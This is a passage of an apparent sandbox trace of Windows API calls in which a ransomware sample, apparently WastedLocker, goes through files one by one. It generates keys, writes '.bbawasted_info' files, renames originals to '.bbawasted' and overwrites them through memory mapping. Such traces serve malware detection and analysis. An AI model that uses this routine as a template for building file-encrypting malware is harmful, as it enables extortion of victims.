hHeap=0x580000) returned 1 [0069.091] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf2e8 | out: hHeap=0x580000) returned 1 [0069.091] _aulldvrm () returned 0x0 [0069.091] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5c8560) returned 1 [0069.092] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.092] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.092] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0069.092] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5c77b0 [0069.092] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.092] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.092] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5c8560) returned 1 [0069.093] CryptGenRandom (in: hProv=0x5c8560, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.093] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0069.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.094] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.095] SetEndOfFile (hFile=0x110) returned 1 [0069.103] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.103] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.103] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.bbawasted")) returned 1 [0069.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.104] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.104] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x10b1e [0069.104] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b1e) returned 0xfe0000 [0069.104] CloseHandle (hObject=0xf8) returned 1 [0069.109] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.110] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.110] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.110] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.111] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.111] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.119] SetEndOfFile (hFile=0x110) returned 1 [0069.121] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.121] CloseHandle (hObject=0x110) returned 1 [0069.123] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.123] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4138 | out: hHeap=0x580000) returned 1 [0069.123] _aulldvrm () returned 0x0 [0069.123] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.123] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.123] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.123] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0069.124] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5c77b0 [0069.124] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.124] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.124] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.124] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.124] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.125] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.126] SetEndOfFile (hFile=0x110) returned 1 [0069.126] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.126] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.126] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.bbawasted")) returned 1 [0069.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.127] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.127] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x493 [0069.127] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x493) returned 0x570000 [0069.127] CloseHandle (hObject=0xfc) returned 1 [0069.130] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.130] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.130] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.130] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.131] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.131] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.139] SetEndOfFile (hFile=0x110) returned 1 [0069.141] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.141] CloseHandle (hObject=0x110) returned 1 [0069.199] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.199] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bed90 | out: hHeap=0x580000) returned 1 [0069.199] _aulldvrm () returned 0x0 [0069.199] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.200] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.200] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0069.200] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5c77b0 [0069.200] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.200] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.200] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.201] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.201] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.202] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.203] SetEndOfFile (hFile=0x110) returned 1 [0069.203] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.203] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.203] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.bbawasted")) returned 1 [0069.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0069.251] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0069.251] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x496 [0069.251] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x496) returned 0x570000 [0069.251] CloseHandle (hObject=0x11c) returned 1 [0069.254] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.254] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.254] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.254] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.255] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.255] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.264] SetEndOfFile (hFile=0x110) returned 1 [0069.267] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.267] CloseHandle (hObject=0x110) returned 1 [0069.269] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.269] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b92d0 | out: hHeap=0x580000) returned 1 [0069.269] _aulldvrm () returned 0x0 [0069.269] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.270] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.270] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\11z8-JO.png") returned 53 [0069.270] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x274) returned 0x5c77b0 [0069.270] lstrcpyW (in: lpString1=0x5c781a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.270] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.270] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.271] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.271] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\11z8-JO.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\11z8-jo.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.272] WriteFile (in: hFile=0x110, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.273] SetEndOfFile (hFile=0x110) returned 1 [0069.274] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.274] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.274] lstrcpyW (in: lpString1=0x5c781a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\11z8-JO.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\11z8-jo.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\11z8-JO.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\11z8-jo.png.bbawasted")) returned 1 [0069.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\11z8-JO.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\11z8-jo.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0069.276] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0069.276] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x18a71 [0069.276] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18a71) returned 0x11a0000 [0069.276] CloseHandle (hObject=0x100) returned 1 [0069.281] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.282] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.282] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.282] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.319] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.319] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.328] SetEndOfFile (hFile=0x110) returned 1 [0069.331] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.331] CloseHandle (hObject=0x110) returned 1 [0069.333] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0069.333] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfb08 | out: hHeap=0x580000) returned 1 [0069.333] _aulldvrm () returned 0x0 [0069.333] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.334] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.334] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6wGud.pptx") returned 52 [0069.334] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x272) returned 0x5bf8f0 [0069.334] lstrcpyW (in: lpString1=0x5bf958, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.334] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.334] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.335] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.335] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6wGud.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6wgud.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0069.337] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0069.338] SetEndOfFile (hFile=0x110) returned 1 [0069.338] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.338] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.338] lstrcpyW (in: lpString1=0x5bf958, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6wGud.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6wgud.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6wGud.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6wgud.pptx.bbawasted")) returned 1 [0069.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6wGud.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6wgud.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.340] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.340] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0xa8cb [0069.340] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa8cb) returned 0x570000 [0069.340] CloseHandle (hObject=0xfc) returned 1 [0069.343] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0069.344] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.344] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.344] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0069.345] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0069.345] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.353] SetEndOfFile (hFile=0x110) returned 1 [0069.356] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.356] CloseHandle (hObject=0x110) returned 1 [0069.357] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0069.357] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfca0 | out: hHeap=0x580000) returned 1 [0069.357] _aulldvrm () returned 0x0 [0069.357] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0069.358] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0069.358] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.358] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7__HJOqTPur_MVS8IuG6.mp3") returned 66 [0069.358] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28e) returned 0x5bf8f0 [0069.358] lstrcpyW (in: lpString1=0x5bf974, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.358] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.358] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0069.359] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.359] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7__HJOqTPur_MVS8IuG6.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7__hjoqtpur_mvs8iug6.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 